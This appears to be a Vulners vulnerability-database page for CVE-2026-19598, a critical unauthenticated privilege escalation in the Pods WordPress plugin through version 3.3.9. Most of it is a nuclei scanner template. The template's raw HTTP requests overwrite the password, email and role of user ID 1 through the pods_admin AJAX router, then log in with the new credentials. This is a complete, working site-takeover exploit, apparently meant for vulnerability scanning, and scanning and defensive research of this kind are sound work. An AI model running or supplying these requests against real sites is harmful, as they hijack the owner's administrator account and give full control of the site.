Lucene search
+L

Pods <= 3.3.9 - Unauthenticated Privilege Escalation via pods_admin AJAX Router

🗓️ 24 Aug 2026 12:10:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

Unauthenticated privilege escalation in Pods <= 3.3.9 via pods_admin AJAX router bypass.

Related
Refs
Code
ReporterTitlePublishedViews
Family
githubexploit
GithubExploit
Exploit for CVE-2026-19598
19 Aug 202602:10
githubexploit
githubexploit
GithubExploit
Exploit for CVE-2026-19598
21 Aug 202613:06
githubexploit
attackerkb
ATTACKERKB
CVE-2026-19598
15 Aug 202617:25
attackerkb
circl
Circl
CVE-2026-19598
15 Aug 202618:10
circl
cve
CVE
CVE-2026-19598
15 Aug 202617:25
cve
cvelist
Cvelist
CVE-2026-19598 Pods <= 3.3.9 - Unauthenticated Privilege Escalation via Authorization Bypass to Admin Methods via 'pods_admin' AJAX Router
15 Aug 202617:25
cvelist
euvd
EUVD
EUVD-2026-59778
15 Aug 202617:25
euvd
nvd
NVD
CVE-2026-19598
15 Aug 202618:16
nvd
patchstack
Patchstack
WordPress Pods plugin <= 3.3.9 - Unauthenticated Privilege Escalation vulnerability
15 Aug 202607:00
patchstack
ptsecurity
Positive Technologies
PT-2026-73042
15 Aug 202600:00
ptsecurity
Rows per page
id: CVE-2026-19598

info:
  name: Pods <= 3.3.9 - Unauthenticated Privilege Escalation via pods_admin AJAX Router
  author: DhiyaneshDk
  severity: critical
  description: |
    The Pods – Custom Content Types and Fields plugin for WordPress is vulnerable to Privilege Escalation via Authorization Bypass in all versions up to, and including, 3.3.9. The vulnerability exists because the pods_admin AJAX router funnels every access check — including the method allowlist, nonce verification, login enforcement, and capability gate — through pods_error(), which under the JSON meta-box-loader compatibility path only writes failures to the PHP error log and returns false instead of terminating the request, rendering all guards ineffective. This makes it possible for unauthenticated attackers to escalate their privileges to Administrator or overwrite the password of any user account, including the site owner's, enabling complete site takeover, or perform another administrator action.
  impact: |
    Unauthenticated attackers can escalate to administrator or overwrite any user password, enabling full site takeover.
  remediation: |
    Update to the latest version beyond 3.3.9.
  reference:
    - https://www.wordfence.com/blog/2026/08/100000-wordpress-sites-affected-by-privilege-escalation-vulnerability-in-pods-wordpress-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-19598
    - https://pods.io/2026/08/14/pods-3-3-9-1-security-release-and-backported-releases/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-19598
    cwe-id: CWE-863
    epss-score: 0.00427
  metadata:
    max-request: 2
    verified: true
    product: pods
    vendor: podsfoundation
  tags: cve,cve2026,wordpress,wp-plugin,pods,privesc,unauth,intrusive

variables:
  passwd: "{{to_lower(rand_text_alpha(12))}}"
  email: "{{to_lower(rand_text_alpha(8))}}@pods.nuclei"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?meta-box-loader=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded

        action=pods_admin&method=save_user&ID=1&user_pass={{passwd}}&user_email={{email}}&role=administrator

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "content_length <= 3"
          - "contains(body, '1')"
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{email}}&pwd={{passwd}}&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1

    matchers:
      - type: dsl
        dsl:
          - "contains(to_lower(header), 'wordpress_logged_in')"
# digest: 4a0a00473045022100b0858a30c9058d5b7a0ffd94f7c1c1b718ad6292c5522cd535f45856ae523af0022064834a11a3c2f8f158cd6d7475209023fa21c7de1bcf1feb7bc451d3f77cf1a7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Aug 2026 11:30Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.19.8
EPSS0.00802
5